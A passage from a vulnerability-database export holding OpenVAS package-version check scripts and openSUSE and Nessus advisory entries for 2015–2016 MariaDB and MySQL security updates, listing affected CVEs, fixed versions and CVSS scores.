See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703385\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\",\n \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\",\n \"CVE-2015-4895\", \"CVE-2015-4913\");\n script_name(\"Debian Security Advisory DSA 3385-1 (mariadb-10.0 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-31 00:00:00 +0100 (Sat, 31 Oct 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3385.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"mariadb-10.0 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 10.0.22-0+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 10.0.22-1 or earlier.\n\nWe recommend that you upgrade your mariadb-10.0 
packages.\");\n script_tag(name:\"summary\", value:\"Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading\nMariaDB to the new upstream version 10.0.22.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmariadbd-dev\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client-core-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-common\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-connect-engine-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-oqgraph-engine-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server-core-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-test\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-test-10.0\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if 
(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4895", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading\nMariaDB to the new upstream version 10.0.22. Please see the MariaDB 10.0 Release\nNotes for further details:\n\nhttps://mariadb.com/kb/en/mariadb/mariadb-10021-release-notes\nhttps://mariadb.com/kb/en/mariadb/mariadb-10022-release-notes", "modified": "2017-07-07T00:00:00", "published": "2015-10-31T00:00:00", "id": "OPENVAS:703385", "href": "http://plugins.openvas.org/nasl.php?oid=703385", "type": "openvas", "title": "Debian Security Advisory DSA 3385-1 (mariadb-10.0 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3385.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3385-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703385);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\",\n \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\",\n \"CVE-2015-4895\", \"CVE-2015-4913\");\n script_name(\"Debian Security Advisory DSA 3385-1 (mariadb-10.0 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-10-31 00:00:00 +0100 (Sat, 31 Oct 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3385.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mariadb-10.0 on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 10.0.22-0+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 10.0.22-1 or earlier.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\");\n script_tag(name: 
\"summary\", value: \"Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading\nMariaDB to the new upstream version 10.0.22. Please see the MariaDB 10.0 Release\nNotes for further details:\n\nhttps://mariadb.com/kb/en/mariadb/mariadb-10021-release-notes\nhttps://mariadb.com/kb/en/mariadb/mariadb-10022-release-notes\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmariadbd-dev\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client-core-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-common\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-connect-engine-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-oqgraph-engine-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server-core-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif 
((res = isdpkgvuln(pkg:\"mariadb-test\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-test-10.0\", ver:\"10.0.22-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4895", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-4910", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4904", "CVE-2015-4833", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4766", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "description": "The remote host is missing an update for the 'mysql-5.6'\n package(s) announced via the referenced advisory.", "modified": "2019-03-13T00:00:00", "published": "2015-10-27T00:00:00", "id": "OPENVAS:1361412562310842503", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842503", "type": "openvas", "title": "Ubuntu Update for mysql-5.6 USN-2781-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for mysql-5.6 USN-2781-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842503\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-27 07:08:00 +0100 (Tue, 27 Oct 2015)\");\n script_cve_id(\"CVE-2015-4730\", \"CVE-2015-4766\", \"CVE-2015-4792\", \"CVE-2015-4800\",\n \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\", \"CVE-2015-4819\",\n \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4833\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4862\", \"CVE-2015-4864\",\n \"CVE-2015-4866\", \"CVE-2015-4870\", \"CVE-2015-4879\", \"CVE-2015-4890\",\n \"CVE-2015-4895\", \"CVE-2015-4904\", \"CVE-2015-4910\", \"CVE-2015-4913\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for mysql-5.6 USN-2781-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mysql-5.6'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered in\nMySQL and this update includes new upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.5.46 in Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\nUbuntu 15.04 and Ubuntu 15.10 have been updated to MySQL 5.6.27.\n\nIn addition to security fixes, the updated 
packages contain bug fixes,\nnew features, and possibly incompatible changes.\n\nPlease see the references for more information.\");\n\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\");\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\");\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-26.html\");\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\");\n\n script_tag(name:\"affected\", value:\"mysql-5.6 on Ubuntu 15.10,\n Ubuntu 15.04,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2781-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2781-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(15\\.04|14\\.04 LTS|12\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.6\", ver:\"5.6.27-0ubuntu0.15.04.1\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0ubuntu0.12.04.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.6\", ver:\"5.6.27-0ubuntu1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2016-0546", "CVE-2016-2047", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-0616", "CVE-2016-0609", "CVE-2015-4879", "CVE-2016-0596", "CVE-2015-4792", "CVE-2015-4819", "CVE-2016-0598", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2016-0505"], "description": "Oracle Linux Local Security Checks ELSA-2016-0534", "modified": "2019-03-14T00:00:00", "published": "2016-04-06T00:00:00", "id": "OPENVAS:1361412562310122922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122922", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0534.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.fi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by 
the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122922\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-04-06 14:33:01 +0300 (Wed, 06 Apr 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0534\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0534 - mariadb security and bug fix update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0534\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0534.html\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\", \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\", \"CVE-2015-4913\", \"CVE-2016-0505\", \"CVE-2016-0546\", \"CVE-2016-0596\", \"CVE-2016-0597\", \"CVE-2016-0598\", \"CVE-2016-0600\", \"CVE-2016-0606\", \"CVE-2016-0608\", \"CVE-2016-0609\", \"CVE-2016-0616\", \"CVE-2016-2047\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-devel\", rpm:\"mariadb-devel~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n 
security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-embedded\", rpm:\"mariadb-embedded~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-embedded-devel\", rpm:\"mariadb-embedded-devel~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-libs\", rpm:\"mariadb-libs~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-server\", rpm:\"mariadb-server~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.47~1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:43:04", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "MariaDB was updated to 10.0.22 to fix security issues and bugs.\n\n The following vulnerabilities were fixed in the upstream release:\n\n CVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\n CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n A list of upstream changes and release notes can be found here:\n\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10022-release-notes/\">https://kb.askmonty.org/en/mariadb-10022-release-notes/</a>\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10022-changelog/\">https://kb.askmonty.org/en/mariadb-10022-changelog/</a>\n\n The following build problems were fixed:\n\n * 
bsc#937787: fix main.bootstrap test (change default charset to utf8 in\n test result)\n\n", "edition": 1, "modified": "2015-12-10T12:13:12", "published": "2015-12-10T12:13:12", "id": "OPENSUSE-SU-2015:2244-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00010.html", "type": "suse", "title": "Security update to MariaDB 10.0.22 (important)", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T11:23:44", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "MariaDB was updated to 5.5.46 to fix security issues and bugs.\n\n The following vulnerabilities were fixed in the upstream release:\n\n CVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\n CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n A list of upstream changes and release notes can be found here:\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\">https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/</a>\n\n", "edition": 1, "modified": "2015-12-10T13:10:14", "published": "2015-12-10T13:10:14", "id": "OPENSUSE-SU-2015:2246-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00011.html", "title": "Security update to MariaDB 5.5.46 (important)", "type": "suse", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T12:22:46", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-1793", 
"CVE-2015-4913", "CVE-2015-4864", "CVE-2015-1789", "CVE-2015-0286", "CVE-2015-4910", "CVE-2015-0288", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4904", "CVE-2015-4833", "CVE-2015-3152", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4766", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "description": "MySQL was updated to 5.6.27 to fix security issues and bugs.\n\n The following vulnerabilities were fixed as part of the upstream release\n [boo#951391]: CVE-2015-1793, CVE-2015-0286, CVE-2015-0288, CVE-2015-1789,\n CVE-2015-4730, CVE-2015-4766, CVE-2015-4792, CVE-2015-4800, CVE-2015-4802,\n CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830,\n CVE-2015-4833, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4862,\n CVE-2015-4864, CVE-2015-4866, CVE-2015-4870, CVE-2015-4879, CVE-2015-4890,\n CVE-2015-4895, CVE-2015-4904, CVE-2015-4905, CVE-2015-4910, CVE-2015-4913\n\n Details on these and other changes can be found at:\n <a rel=\"nofollow\" href=\"http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html\">http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html</a>\n\n The following security relevant changes are included additionally:\n\n * CVE-2015-3152: MySQL lacked SSL enforcement. Using\n --ssl-verify-server-cert and --ssl[-*] implies that the ssl connection\n is required. 
The mysql client will now print an error if ssl is\n required, but the server cannot handle an ssl connection [boo#924663],\n [boo#928962]\n\n", "edition": 1, "modified": "2015-12-10T12:12:21", "published": "2015-12-10T12:12:21", "id": "OPENSUSE-SU-2015:2243-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00009.html", "type": "suse", "title": "Security update to MySQL 5.6.27 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T03:45:54", "description": "The version of MariaDB running on the remote host is prior to 5.5.46.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified flaws exist related to the\n Partition subcomponent that allow an authenticated,\n remote attacker to cause a denial of service.\n (CVE-2015-4802, CVE-2015-4792)\n\n - An unspecified flaw exists related to the Query Cache\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4807)\n\n - An unspecified flaw exists related to the DDL\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4815)\n\n - An unspecified flaw exists related to the Types\n subcomponent that allows an authenticated, remote\n attacker to gain access to sensitive information.\n (CVE-2015-4826)\n\n - An unspecified flaw exists related to 